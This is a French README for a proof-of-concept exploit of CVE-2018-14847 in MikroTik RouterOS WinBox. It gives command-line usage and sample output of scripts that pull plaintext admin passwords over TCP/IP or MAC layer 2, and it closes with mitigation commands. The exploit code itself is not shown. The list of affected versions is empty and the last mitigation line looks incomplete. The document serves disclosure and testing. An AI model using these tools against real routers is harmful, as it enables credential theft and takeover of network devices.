
Exploit de preuve de concept pour CVE-2018-14847 permettant la lecture de fichiers arbitraires de mots de passe en texte clair à partir du service WinBox de MikroTik RouterOS, avec prise en charge des serveurs TCP/IP et MAC de couche 2.
Ceci est une preuve de concept de la vulnérabilité critique WinBox (CVE-2018-14847) qui permet la lecture arbitraire de fichiers contenant des mots de passe en texte clair.
https://n0p.me/winbox-bug-dissection/
Ce script ne fonctionnera PAS avec Python 2.x ou inférieur.
Le script s'utilise simplement avec des arguments simples en ligne de commande.
Exploiter la vulnérabilité et lire le mot de passe.
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
Exemple :
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord


Vous pouvez extraire des fichiers même si l'appareil n'a pas d'adresse IP.
Vérification de découverte simple pour les appareils Mikrotik connectés localement.
python3 MACServerDiscover.py
Exemple :
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
Exploiter la vulnérabilité et lire le mot de passe.
python3 MACServerExploit.py <MAC-ADDRESS>
Exemple :
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
User: admin
Pass: Th3P4ssWord
Toutes les versions de RouterOS du 2015-05-28 au 2018-04-20 sont vulnérables à cette exploitation.
Appareils Mikrotik exécutant les versions de RouterOS :
Pour plus d'informations, voir : https://blog.mikrotik.com/security/winbox-vulnerability.html
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
/tool mac-server mac-winbox